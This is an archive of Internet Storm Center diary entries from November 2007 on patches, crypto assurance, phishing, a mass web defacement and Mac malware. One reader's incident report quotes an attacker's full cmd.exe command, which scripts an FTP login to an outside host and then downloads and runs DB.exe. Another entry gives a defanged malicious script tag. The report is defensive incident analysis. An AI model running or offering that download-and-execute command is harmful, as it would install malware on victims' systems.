Since the "codec" binaries change frequently and AV coverage is notoriously poor, the probably best defense in a corporate environment is to have a web filter in place that blocks access to porn pages. What used to be seen as a mere "compliance" measure to not to run afoul of sexual harassment rules at the workplace has long since turned into a cornerstone of most companies' malware defense.


Published: 2007-11-17

Architecture, security and assurance

Kind of following on from Swa's post from yesterday.   When we go to a banking website we check for the little padlock, when we send a confidential communication we encrypt it.  Much of the internet now is dependent on strong encryption.  Ecommerce relies on solid encryption, as do governments, businesses, etc.  So what if encryption goes bad?  Well, at best people laugh at you (remember CSS) at worst national security is compromised, or your company’s reputation is shot to pieces.

Craig (thanks) wrote in with an observation that set me thinking. 

I don’t think there is a single place in a computing system where the architecture and implementation have more critical impact then in implementation of cryptographic systems.

We all know that if the key is compromised, the game is over.   We also tend to think “I’m using AES-256, so everything should be sweet”, but not all of us think about the rest of the system.  For example the pseudo-random number generator (PRNG) on Windows issue swa talked about yesterday, shows that if thing aren’t quite as random as you’d hoped, or access can be gained then things go awry and using a strong algorithm means nothing. 

As Craig writes

just because your pieces fit and operate as a cryptographic system, doesn’t mean that you put them together in a way that makes the cryptographic system secure

Now governments typically have recognised this issue.  Many will state that unless the cryptographic product has been fully examined by them, as a government agency, you are not permitted to use it to transmit anything sensitive.   

If the architecture to deliver cryptographic services has not been evaluated, then if a recognised strong algorithm it may still be used albeit for limited use.   To me it shows that there are governments that have recognised that the way something is put together is very important.   This is one area where business needs to catch up.  You often hear the words “but it uses insert favourite algorithm here”.  In the world today we may need something more.

Common Criteria

So how do you get some of this assurance that a product is put together in a secure manner?  Many organisations and government look at products that have been evaluated.   Typically this is now under a scheme called Common Criteria (CC)  (old timers will remember the orange book as well).  One of the things to look out for is the security target of the device/software being evaluated.   For example there are some firewalls on the list whose security target does not include the VPN or encrypting capabilities.  So the firewalling capabilities have been verified, but the encryption functions have not.   If you are a business, then this may still be OK to use, but if you are a government agency, it may mean that you will have to purchase a separate product to provide VPN connectivity for remote users.

The devices also need to be configured in line with the Security Target and the Certification report in order to be able to comply.  Over time there have been examples where a product is rated as a secure product, but only if you don’t connect it to a network (yes it was a product that provides network functionality).   Again government bodies typically have to pay attention to this, business less so, but it is always good to know what has been evaluated and what has not.  Also don’t forget that not all versions of the same product will be evaluated.  It can be an expensive process so vendors may only have major new versions evaluated.

So next time when a vendor (sorry guys) tells you "this product is rated EAL something", you may want to ask for the relevant certification report and Security Target and have a good read, but still better than nothing.


Mark H - Shearwater




Published: 2007-11-16

'Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin.'

The title is actually a quote from John Von Neumann. And while it's over half a century old, it is still indicative of the difficulty faced by those that are forced to generate random data.

When I teach a certain awareness course for developers, one of the basic messages is to not to try to reinvent crypto components, but use proven good ones. Basically, it's just way too hard to get it perfectly right for the mere mortals among us.

In crypto you basically have 4 basic building blocks: the symmetric and asymmetric cyphers, the hash functions and the (pseudo) random number generator. With those, you can build whatever you need.

Lately the random number generator in windows seems to be under scrutiny. Basically some crypto researchers are calling it broken and the press reports that Microsoft mostly seems to deny it's a problem.

While it's rather easy to make fun of Microsoft in this, take a look at what Microsoft employees write about PRNGs and the NIST recommendation: http://rump2007.cr.yp.to/15-shumow.pdf.

The viewpoints:

  • The research paper: http://eprint.iacr.org/2007/419.pdf
  • Microsoft doesn't seem to have a public statement, but their position boils down to:
    • There is no security vulnerability as the information is not leaked.
    • The information is actually only released locally to authorized users. E.g. Administrators have wide rights.
    • They encourage user to run with limited user rights.
    • They seem to be ready for what they call defense in depth (inside one machine) and to reevaluate the strength of their PRNG.
      [If a Microsoft spokesperson wants to send me quotable material, feel free ...]

Still security professionals will need to position themselves on the issue in the long run.

What do you think about it, why?  Let us know and we'll summarize the best replies we get.

Swa Frantzen


Published: 2007-11-16

Tiger and Leopard upgrades

Apple released in the last days upgrades to it's Tiger (10.4) and Leopard (10.5) versions of OS X.

For those unfamiliar with Mac OS X: this isn't just security patches, it somewhat comparable to what Microsoft calls a service pack. As such it can include stability fixes, features, etc. and security fixes.

10.4.11 includes a long list of security fixes. Since it's a all or nothing deal, there's very little real use in discussing all of them individually. Just take the plunge: there are a few bad ones in there, so you'll need it anyway. Some readers wrote us that there might be some issues with it all, so be careful. That said, I'm running it for a bit already and have not seen a single bad thing so far.

10.5.1 includes some security fixes too, all centered around the application firewall:

Apple also released patches for the beta of safari, but hey, it's beta software!

Swa Frantzen


Published: 2007-11-15

Incident Handling 101

Every day we see new exploits and old, patches and vulnerabilities, DOS and DDOS.  As the newest member of the Internet Storm Center, I am in data gathering mode.  Even though I have been a GCIH (#50) since 2000, we as handlers have to start learning the incident handling process all over again every time we join a new team.  As a new handler, my question was where is the contact list?  The first step in the Incident Handling process is preparation, so let’s do it.  Let’s get this list updated.

By the way, if you need to know how to prepare for an incident, SANS has great Incident Handling Forms as a part of SCORE (Security Consensus Operational Readiness Evaluation).  SCORE is “dedicated to providing a community consensus minimum standard of procedures, and checklists for overall infrastructure security."  There is no need to reinvent the wheel, so check out the forms and prepare your team for an incident.

So we ask, if you are on a CIRT team and would like for us to have your team’s contact information in case we see activity you should know about, please send it to us on our contact page.  We look forward to hearing from you.

Fair Winds, Mari



Published: 2007-11-14

Miscellaneous items

Nothing really major happening today, so here are couple of quick items:

  • Many security fixes released by Apple today for OS X and Safari on Windows.
  • There is more fallout from the salesforce.com breach.  This time phishing emails were sent to recipients from the supposed "Canadian Revenue Service" (Canada tax agency).
  • There is a fake Microsoft Security Update bulletin going around that looks pretty real.  They seem to be customized with the recipient's full name.  There is a link to malicious EXE files proclaiming to be the patch installer.


Published: 2007-11-14

New version of cvtwin, now with HTTP upload

First of all: if you are currently submitting data to DShield, and everything works right: Don't touch it ;-)

Historically, data was submitted to DShield via e-mail. I choose this method way back (Nov. 2000) as it provided easy load balancing and queuing in case the main database server was under heavy load. Initially, we only had a Linux client, and of course its trivial to send e-mail from almost any linux host. The first client was actually a 1 line shell script.

I think e-mail its still a good idea, but we are having more and more issues getting e-mail to us. In particular our Windows client, cvtwin, uses an external simple command line client which isn't always that easy to configure as ISPs block port 25 and require users to log in to mail servers.

So earlier today, Wayne, our "cvtwin guy", added a new function: It will now submit data via HTTP as well as SMTP. I think in particular in Windows scenarios this makes a lot of sense. Most of our windows users are home users. They run some kind of logging software on a work station and submit logs collected by this software. These systems are used for web browsing and usually have unobstructed access to port 80.

So if you have issues running CVTWIN because you are not able to send mail, give the new version a try. And again: If it works, don't touch it ;-)

More details about CVTWIN: Windows Clients
Changelog (use for now for documentation of the http feature)

This is an experimental release at this point. Please report issues to info@dshield.org.


Published: 2007-11-13

november black tuesday overview

Overview of the November 2007 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS07-061 An input validation failure allows remote code execution. Replaces MS06-045
Windows shell - exposed via IE7, skype, acrobat, ...

KB 943460
Well known problem, exploit in the wild Critical PATCH NOW Important
MS07-062 Lack of entropy in pseudo random number generation results in weak transaction IDs and therefore in DNS spoofing vulnerabilities. DNS spoofing can lead to man-in-the-middle attacks and more.
Replaces MS07-029

KB 941672 No publicly known exploits Important Critical Critical(**)


We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**): Assuming DNS does have a critical role on the system.

Swa Frantzen -- NET2S


Published: 2007-11-13

phone phish twist

Mike sent us an interesting twist on a phishing scheme. The victim receives a message from a credit union associated in name with the victim receiving the email, and it asks to call the credit union on a provided phone number.

It's well targeted, so we're obfuscating the parts that identify the victim all too easy:

Due to unusual levels of fraud we have had to suspend any future authorizations being conducted with your VISA Check Card in Mexico and United States. If you want this restriction to be removed from your accont please call us immediately. 

Call (877) 228-0944 to have this restriction removed.

We apologize for any inconvenience this may cause.

? Copyright 2007 ****** Credit Union.

From an awareness point of view to your customers/users/... the key message here is to:

  • not only to teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
  • but to also tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)

We've checked out the phone number itself. When doing this, make sure calls to scam artists don't get traced back to you, they tend to become aggressive every so often. It seems this number is used more in scams like these: http://800notes.com/Phone.aspx/1-877-228-0944.

One of the fellow US based handlers called the number to validate it's not a joe-job to discredit a real institution.  He found it's an automated system on the other side and it indeed asks credit card numbers, PIN, expiration date etc. It'll also tell you your card is now activated (read: if you entered valid data they will now use your card actively). Interestingly it doesn't identify the institution it's supposedly working for.

Swa Frantzen


Published: 2007-11-12

WSUS issues?

We've received several reports this morning of folks getting SQL errors from WSUS after synchronizing.  The error suggests some sort of problem in the new product metadata.  One report suggested it might be US only, but some forum postings elsewhere suggest that it might be hitting the UK, too, so I wouldn't count on it being limited geographically.  We've pinged our Microsoft contacts, but not heard back from them yet.  We'll update as more info becomes available.  Thanx to Mark and Dennis for bringing this to our attention.




Published: 2007-11-11

Google XSS

Juha-Matti reminded us of a new Google cross-site scripting issue related to a recent JAR: protocol vulnerability in Firefox that was reported by Petko D Petkov on Saturday:







Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-11

Cyber Jihad? Yeah, right...

In the news this past week were the ominous stories about a Cyber Jihad on November 11th.  OK terrorists, it's November 11th and we haven't seen your little Jihad yet.  As Johannes said in his diary a few days ago, it seems to have been called off.  What happened?  If there are any terrorists hanging out here reading this diary I'd like to hear from you.  Please use our contact page.

This whole cyber terrorism thing has always bothered me, especially since every time some nut decides that the "next attack" is going to be against an online target the press goes into hyper alert mode.  Folks, let's get serious about this for a few minutes.  I know that this is politically incorrect, but the odds of a terrorist group "terrorizing" the Internet with cyber bullets and e-bombs are about as small as the odds of the Morse Code coming back as a primary means of communication.  It's not zero, but it's also not much more than zero.  (Remember, math fans, that odds are a comparison expression such as 1:20 or 1:100 and can also be expressed as a real number by dividing the first value by the second.)  The terrorists use the Internet for the same thing everybody else does - communicating with each other.  They also use it to raise money through criminal activity, then launder it via one of the many electronic payment systems.  Ever look at the spam and phishing junk mail you receive?  It's not just the Russian Business Network operating in the shadows.  With the Internet providing near-perfect communications and a seemingly endless supply of money why would a terrorist group want to blow it up?

So for those looking for something to do while we remember our military veterans and fallen comrades in arms today (don't forget today is Armistice Day, also known as Veterans Day or Remberance Day in several countries) think about how a terrorist group might actually go about terrorizing the Internet.  Send us your ideas and we'll publish them here.  The point is to learn from this exercise, to see what is possible and then to ask what we can do to prevent it or mitigate any consequences should it happen.

Thank You, Veterans, for your service to your country!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-10

"Malicious" Websites

Previously, we often warn people from visiting unknown/suspicious websites as they could contain malicious content. But nowadays, even visiting known websites, you could be affected. It was reported that the India Times website contains hundreds of malicious files that could infected those visit the website.


Legitimate websites containing malicious content is not something new as it has already happened a couple of times. Web administrators must be prudent to ensure their websites are properly secure. Hackers are now clever enough not to deface your websites to alert you but rather plant malicious content on them and wait for victims. Periodically running a vulnerability scan on your web systems is necessary to avoid known holes. Let us know if you have other good tips for the web admin.


Published: 2007-11-10


Our reader Oscar shared with us that when he was playing world of warcraft, he suddenly lost control and got some "strange" lines appearing (injected command strings displayed within his WoW session). Below is a screenshot.

As he is also running a VNC server with a fairly easy guess password, this is what he got a couple of files:
* DB.exe
* hirc.exe
* nc.exe
* PI.exe
* vnckiller.exe

If you have encountered similar experience, let us know.

Lesson learnt: If you put any services expose to Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.


Oscar wrote back and gave us a detailed description of what happened.  Here is what he said:

So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.

So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"

then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, did  a mget * and thought the SANS folks would be interested in these files.

Now, how did they get in?  My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password.  Well, the password i picked was pretty guessable.  When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in.  Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted.  Thank goodness I wasn't

A question for our readers:  has anybody seen this happen to their session in WoW or any other virtual world simulation?


Published: 2007-11-09

Search engines that are no search engines

The DShield database was running a bit "hot" earlier today, so I took a closer look at the web log and found that one particular "search engine" was indexing the site rather aggressively:

a.b.c.d - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html?date=2007-11-09 HTTP/1.0" 200 500572 "-" "gsa-crawler (Enterprise; S5-FTNF3BWZPUJAS; nobody@google.com)" "-"

At first, I thought "oh well, its google". But looking at the user agent string closer, reveals some subtle differences. This is a Google search appliance, not the uber-google-bot we all love. The regular Google bot looks like this: - - [09/Nov/2007:15:24:37 +0000] "GET /date.html?port=47109&date=2007-10-25 HTTP/1.1" 200 7538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

I have seen similar cases a few times now. While this one was not malicious, in some cases attacks used google's (or other search engine) user agent strings. I can only assume that this is an attempt to fit in better, and maybe retrieve a search engine version of the page. If anybody knows a good reference where to find IP address ranges used by certain search engines: let us know.

(and btw... if you need bulk data access to dshield data: Please ask. Spidering the site is just not very efficient and you will run into some anti-harvesting traps sending you in circles)

Johannes B. Ullrich
Chief Research Officer, SANS Technology Institute


Published: 2007-11-09

yl18.net part II

As handlers we tend to have a tiny stubborn streak, no really, we are, just ask our respective partners, they’ll confirm it.   So in the fine tradition of "I wonder what else is going on" I dug a little bit further. 

The more I looked the more familiar it seemed.  Remember the Super Bowl infection back in February?  Mass defacement, using SQL Injection, downloading a file (although almost everything does that nowadays),  script is #.js, etc.   It all sounded a bit the same.  So was there a link?

Seems there might be at that.   There are various sites that will let you have a look and see what other sites are or were hosted on a particular IP address.  The address that yl18.net points at shows that other web sites hosted on the same server as yl18.net are:

  • ·         137wg.com
  • ·         Worldofwarcraftn.com
  • ·         Zj5173.com

A quick google will show you that 137wg.com  and Zj5173.com  were used in the Super Bowl defacements.  The warcraft site might be legit, but so far it is three against one on the server. 

When you look at the title of the site 137wg.com you will find a reference to the newasp.com.cn domain (remember ANI?)

Following the yellow brick road on yl18.net  you end up adding to the counter hosted in the domain cnzz.com, strangely familiar from both the Super Bowl and ANI issues earlier this year.    So it would seem that there may be a link.

The good news so far is that the executable being downloaded seems to be detected by most AV products.  The sad news is that when I checked the other day the number of infected sites was about 30K and now about 52K sites.

If you use URL blockers in your organisation, then you may want to block the four domains and your users will be protected for at least the next little while.


Mark  H - Shearwater


Published: 2007-11-08

Gone in 3600 seconds: story about TCP Keep-Alives

One of the things I’ve been working on recently included monitoring dropped sessions on an internal firewall. This firewall (along the others) is positioned between an application server and a database server. The firewall allows only incoming connections from ephemeral ports on the application server to port 1521 on the database server (that’s Oracle SQLNET). The following figure shows the setup:

Network architecture

The dropped packets log contained something interesting. From time to time, the firewall dropped some packets coming from the database servers, as shown below:

Dropped packets:

Source IP:Port           Destination IP:Port

This was pretty strange as the database server should never open new connections so I did some further research. I setup two sniffers on both sides and analyzed captured packets. That allowed me to reconstruct what happened here – the example I’m using below shows a session that starts at 10:00AM:

  • 10:00 – The application server connect to the database server, port 1521 (SQLNET). Connection is established from an ephemeral port, 31578. The application server starts sending queries following a normal TCP three way handshake.
  • 11:00 – The application server sends the last query to the database server which replies with results. The application server sends an empty ACK TCP packet acknowledging that it received this packet.
  • 12:00 - One hour after the last packet has been seen in a TCP session, the internal firewall’s timeout causes it to delete this session from its stateful connection table. This means that any future packets pretending to belong to this session will be dropped.
  • 13:00 – The database server sends an ACK packet to the application server. This is caused by the TCP keep-alive mechanism as described in RFC 1122. By default, after 2 hours of a session being idle, the OS on the database server sends an ACK packet to see if the remote side is still up. If no answer is received, it exponentially back offs with new ACK packets. After this, it will drop this session.

So, the problem here was caused by the application server not properly closing a session that it doesn’t use any more, and not using TCP keep-alives. It was interesting to see that the application server used the session exactly for 1 hour.

In order to properly fix this we would have to work with the vendor on the application server to see why it stops using connections without closing them. An easier fix was to increase the timeout setting for the stateful connection table on the firewall to 9000 seconds (2.5 hours), of course, after carefully examining the impact of this action on the firewall since it will cause it to use more memory for similar questions. This allowed ACK packets (TCP keep-alives) sent from the database server through the firewall and the application server correctly replied to them.

Why all this you might ask? This was one example of why we should spend time cleaning our local networks as well. During this exercise we found heaps of incorrectly configured servers and/or applications that people lived with for ages, without even knowing what’s going on on the network (low) layer.





Published: 2007-11-06

yl18.net mass defacement

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet:

script src="hXXp://yl 18.net/0.js"

This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:

AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 2007.10.19 -
F-Prot 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 2007.11.06 -
VBA32 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 

This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.

These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.

Maarten Van Horenbeeck


Published: 2007-11-06

Quicktime 7.3 patches serious security bugs

Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:

  • A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
  • A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
  • Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
  • Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
  • A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
  • A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).

The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.


Published: 2007-11-06

Windows XP and 2003 local privilege escalation vulnerability

Microsoft has an advisory and a blog entry up on a new vulnerability, CVE-2007-5587, in the Macrovision SECDRV.SYS driver. This file is included with Windows XP and Windows Server 2003.

It appears partial information on the vulnerability and exploit has been in the wild since mid October, and it is being exploited in a limited number of incidents.

According to the advisory, this is a local attack which allows privilege escalation. While plans for an official Microsoft supplied patch are in the works, Macrovision has released an update from their website which allows you to mitigate this issue.

Maarten Van Horenbeeck


Published: 2007-11-05

Cyber Jihad Called Off

Ok. Not really. But a lot of what you read may just be hype. Over the last couple days, quite a few readers asked us about our opinion regarding the "cyber jihad" that's supposed to start on November 11th. Couple reasons we think this is not going to be an issues:

  • the site calling for it has tried to do so before without success
  • November 11th is also the official start of carnival, at least in germany, and a day for hoaxes
  • Even if something is going to happen, I doubt it will be more then a lame DoS attack
So in short: stay calm, focus on best practices and you don't have to do anything special on November 11th. If your systems are secure, they will be fine. If they are not secure, then they will get hacked no matter if its cyber jihad or the script kiddie from next door.

In the past, political attacks like this resulted in some more or less manual DoS attacks. Expect things like calls for supporters to reload particular "offensive" websites, or use the ping command to flood them. In some cases, supporters may be asked to install trojans. But chances are that the usual criminals will just take advantage of this and use it as a trick to install the regular criminal bots.

Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute.


Published: 2007-11-05

Top IPv6 Implementation Issues

Have you implemented IPv6 yet? Are you considering it or testing it right now? I am working on a list of the top IPv6 implementation issues, and would like to hear what problems you ran into. Please use our contact form and mention "IPv6" as part of the subject.

A complete list will be presented at the CDI conference in December and we will post it here after the conference.

Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute


Published: 2007-11-04

Daylight Saving Time Reminder for North America (with some exceptions)

A last minute reminder that in some regions (including the United States, Canada, the Bahamas, Bermuda, and the French territory of Saint Pierre and Miquelon, and likely others that I have missed) the clocks will be set back.  See Marc's entry from last week for more details.

Be sure to check your appliances, unpatched computers and PDAs.  It's also a good time to change the batteries in your fire/smoke alarms.


Published: 2007-11-02

root nameserver migration

DNS name servers that don't forward their requests to other DNS servers, need to know some of the IP addresses of the root name servers in order to find their way to the rest of the information. They either have this knowledge built-in or use an external file containing in initial mapping.

The "L.ROOT-SERVERS.NET" root name server changed its IP address, and hence some updating to the hints could be useful.

For the record: this isn't an urgent update. Consider it an opportunity to verify your name server software is up to date on patches and perhaps to learn a few interesting bits on how the DNS system works.

Swa Frantzen


Published: 2007-11-02

Symantec local privilege escalation (Mac products)

A local privilege escalation problem in a security product like anti-virus software typically sets of quite some alarms with security people as the software is installed for getting the machines more secure, not less.

Mac versions of Symantec's anti-virus software have a local privilege escalation problem. It allows members of the admin group to gain "root" powers.

Still members of an admin group can use sudo to get a local shell with root powers anyway, hence we're not likely to loose much sleep over this one. That is , until it gets automated in a second stage exploit.

See http://securityresponse.symantec.com/avcenter/security/Content/2007.11.02.html

Swa Frantzen


Published: 2007-11-02

Firefox update

The expected stability update to Firefox is out.

It fixes some known problems in version, but nothing flagged as security related.

Funny, stability seems to be like availability. Probably proof quite a few still don't consider availability as an integral part of security ...

Swa Frantzen


Published: 2007-11-01

Digital cartographers

Mankind has always had a desparate need to identify its environment. Only by studying our surroundings, we’ve been able to make changes that help us live better. This is also valid for the virtual world we ourselves created.

Complicating matters though, there are multiple parallel maps which essentially cover the same infrastructure, but from different points of view. There are network diagrams, huge maps of the internet and those showing how individual cities interconnect.

At another layer, there are now maps that try to chart how people interrelate – social networks, as we call them. Other maps identify how suspected criminal networks operate or how they structure domains used in specific attacks.

One major issue with maps is that we tend to consider them accurate. When we use maps in our daily lives, they generally show us the way from point A to point B, and they are always right. This is because of a fundamental feedback loop. When I cross from point A to point B, others have likely crossed from point C to point D while meeting the same road. If the map is inaccurate, errors get reported and fixed very smoothly. There’s a lot of traffic, after all.

Our network maps however compare much better to those built hundreds of years ago. They were created by a single person visiting a new region or continent, and contained errors. From 1605 to 1722, for example California was regularly painted on maps as an island.

In addition, maps are often used to sell beliefs. They aren’t necessarily wrong, they just present the world as it exists in the cartographer’s mind. Try grabbing maps of the Spratly Islands from various East Asian countries, or maps of the Middle East from Israel and Syria.

As security professionals, we all meet organizations maintaining network diagrams that do not fully match reality. Their perimeter is not where they thought it was, or various hosts are exposed in ways not fully realized. Making good risk management decisions starts with great asset management, and this requires you to keep your maps up to date. From experience, it appears to me that smaller organizations have problems keeping smaller diagrams up-to-date, while larger organizations have really good detail diagrams for individual solutions, but are lacking insight in their overall, distributed network environment.

Some ways to remediate this:

  • Recognize that diagrams may not be accurate by assigning a confidence rating to each of them, and then work to increase confidence through verification;
  • Use vulnerability management such as scanning to identify assets. However, always take into account their limitations (discovery can be slow, is always incomplete – even when you scan 65535 ports on a variety of protocols);
  • Network IDS can sometimes contribute if you're looking beyond the individual alerts but at overall flows.

I'm very interested in hearing from you on measures you've taken to deal with these issues.

Maarten Van Horenbeeck


Published: 2007-11-01

Cyber Security Awareness Month - Summary and Links

On behalf of the volunteer handlers of the SANS Internet Storm Center, I'd like to pass along our deep appreciation to all of the readers who sent in hundreds of comments and ideas during the past month!  As promised, below is an index to all of the Cyber Security Awareness Month diaries that were published over the past 31 days.  We are working on producing a full document that has all of the submissions (cleaned up, reformatted, and sanitized if needed) that were received.  As you can imagine it will be a while before it's ready for downloading due to the volume of information that was sent to us.  If you have any final thoughts or want to add some additional tips to the subjects, please send send them to us via our contact form.

1. Establishing a User Awareness Training Program
  1 Penetrating the "This Does Not Apply To Me" Attitude
  2 Multimedia Tools, Online Training, and Useful Websites
  3 Getting the Boss Involved
  4 Enabling the Road Warrior
  5 Social Engineering and Dumpster Diving Awareness
  6 Developing and Distributing Infosec Policies

2. Best Practices
  7 Host-based Firewalls and Filtering
  8 Anti-Virus, Anti-Spyware, and Other Protective Software
  9 Access Controls, Including Wireless, Modems, VPNs, and Physical Access
 10 Authentication Mechanisms (Passwords, Tokens, Biometrics, Kerberos, NTLM, Radius)
 11 File System Backups
 12 Managing and Understanding Logs on the Desktop or Laptop (AV, Firewall, or System Logs)
 13 Patching and Updates

3. Hardware/Software Lockdown
 14 Data Encryption
 15 Protecting Laptops
 16 Protecting Portable Media like USB Keys, iPods, PDAs, and Mobile Phones
 17 Windows XP/Vista Tips
 18 Mac Tips
 19 Linux Tips
 20 Software Authenticity (Digital Signatures, MD5, etc.)

4. Safe Internet Use
 21 Understanding Online Threats, Phishing, Fraud, Keystroke Loggers
 22 Detecting and Avoiding Bots and Zombies
 23 Using Browsers, SSL, Domain Names
 24 Not All Patches Are Released on a Tuesday
 25 Using Email, PGP, X509 Certs, Attachments, Instant Messaging and IRC
 26 Safe File Swapping
 27 Online Games and Virtual Worlds

5. Privacy and Protection of Intellectual Property
 28 Cookies
 29 Insider Threats
 30 Blogging and Social Networking
 31 Legal Awareness (Regulatory, Statutory, etc.)

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-11-01

DNS changer Trojan for Mac (!) in the wild

We received some reports of various companies (http://www.intego.com/news/ism0705.asp) reporting about a Mac DNS changer Trojan in the wild. As I happened to receive a sample of it, I decided to analyze it quickly.

The whole Trojan is relatively simple and works almost exactly the same as its brother for Windows  operating systems . In case of execution, the Trojan changes the DNS settings on the machine and reports back to the C&C server.

While the Trojan is relatively simple and not a big threat, two things came to my mind immediately: the bad guys are taking Mac now seriously – this is a professional attempt at attacking Mac systems (and they could have been much more damaging really). The second thing that folks at Sunbelt noticed (http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html) is that when they sent a sample to VirusTotal there were 0 (zero, nada, nilch) products that detected this.

